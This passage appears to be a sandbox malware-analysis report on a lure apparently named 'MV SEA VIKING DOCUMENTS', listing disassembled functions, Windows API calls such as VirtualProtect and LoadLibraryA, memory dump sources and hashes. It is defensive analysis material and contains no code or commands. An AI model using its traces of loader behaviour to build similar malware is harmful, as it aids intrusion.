                                                                                                                                                                                                                                Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                                                                                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245D977 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c53a9e6d3058dca37beeabd02d44a48c35e66880a6f017140af95933dd167f22
                                                                                                                                                                                                                                • Instruction ID: 365a5628b02d3196191055f806d3a4da007d44ea85996db0ff700aef341e76ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c53a9e6d3058dca37beeabd02d44a48c35e66880a6f017140af95933dd167f22
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD31E175A043ADDFCF349E688D547EA37A6AF1A760F84012ADC9DCB302D3708A42CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245AE8A Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(?,-09075E35,-C761E599,-BC93AC97), ref: 0245B0A3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                • Opcode ID: a47c672fd4c8e34cf6fd9033c43b6a70bcc1ca3cb293d94984ecd6f445a9a73c
                                                                                                                                                                                                                                • Instruction ID: a86be888fe9992c5b2fec6c17cda84d1f60648fb159676ac53c0faf7ba504b1a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47c672fd4c8e34cf6fd9033c43b6a70bcc1ca3cb293d94984ecd6f445a9a73c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B2138F2244259DFCB788E348C68BFB36A69F58740F90411FDC4A9B244D7308A41CB01
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245E0E8 Relevance: 1.6, APIs: 1, Instructions: 69libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                • Opcode ID: fc60d92d3f5e881f6d7725fbb5d43ee8094aa3c79a0f1ae080a0465d8fe11e85
                                                                                                                                                                                                                                • Instruction ID: 0b592ce95714614512dbf0665fc3148110cd0d9e2666c4c365ddbea76391e2af
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc60d92d3f5e881f6d7725fbb5d43ee8094aa3c79a0f1ae080a0465d8fe11e85
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8921D270A4035EDFCF30AE68CD687DE37A6AF19760F94012AEC99CB201D7308A428B10
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245DBB3 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                • Opcode ID: fdeb51c3739d3a4bb1f704109385b5d3ce6cc1316f17a469e17b858443a4ebd3
                                                                                                                                                                                                                                • Instruction ID: 02d88a383b1354527b485e8fb577f5b7510ed62c32c51b8bfcfbfef49c6b511c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdeb51c3739d3a4bb1f704109385b5d3ce6cc1316f17a469e17b858443a4ebd3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61019670B4035EDBCB30EE698D947DE37AA9F19760F84412BDC99CB206D37096468B51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02453972 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • TerminateProcess.KERNELBASE(-4D6F3B6E,405A78C6), ref: 0245AC9A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProcessTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 560597551-0
                                                                                                                                                                                                                                • Opcode ID: 1589fa0e80cc14bd6887db7ea5c671364ced531e600dc5790146c15a9f52a0fa
                                                                                                                                                                                                                                • Instruction ID: 6b7592396135eb61445e072cc701767f8819b4d93fe19c3c2c29488fbb6c0346
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1589fa0e80cc14bd6887db7ea5c671364ced531e600dc5790146c15a9f52a0fa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54F0272034831A8FE7255D358D5A3DB37A3FF91280F85822ECC9983048C33585818B03
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 71492A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(7149505C,00000004,00000040,7149504C), ref: 71492A9D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                • Opcode ID: dc208dda6eafdc9a361c52d9287294cb55b840819d1ede71293ad54627a938fb
                                                                                                                                                                                                                                • Instruction ID: f923869caf169b1742ee17cebb98b25462cc35ad8e7a4be9ba1834af30933f9e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc208dda6eafdc9a361c52d9287294cb55b840819d1ede71293ad54627a938fb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29F0AEF2A09280DEC351CF2B8445B093FF0B76A304B35462BE188FE241E3344046DB95
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                                • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02451880 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnumWindows
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1129996299-0
                                                                                                                                                                                                                                • Opcode ID: 14f8010e2c8e59abf5757123f95fee881161beb2c4ec6395f2bd549c0512ba66
                                                                                                                                                                                                                                • Instruction ID: 252bdcaeadeebd790110c23340d18b388410bacb45602dddd1c89554fef0fc11
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14f8010e2c8e59abf5757123f95fee881161beb2c4ec6395f2bd549c0512ba66
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8D022330204088FC736CE50A8483C62710FB80010F684813C218CBA88C230AA0383E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                                                                • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
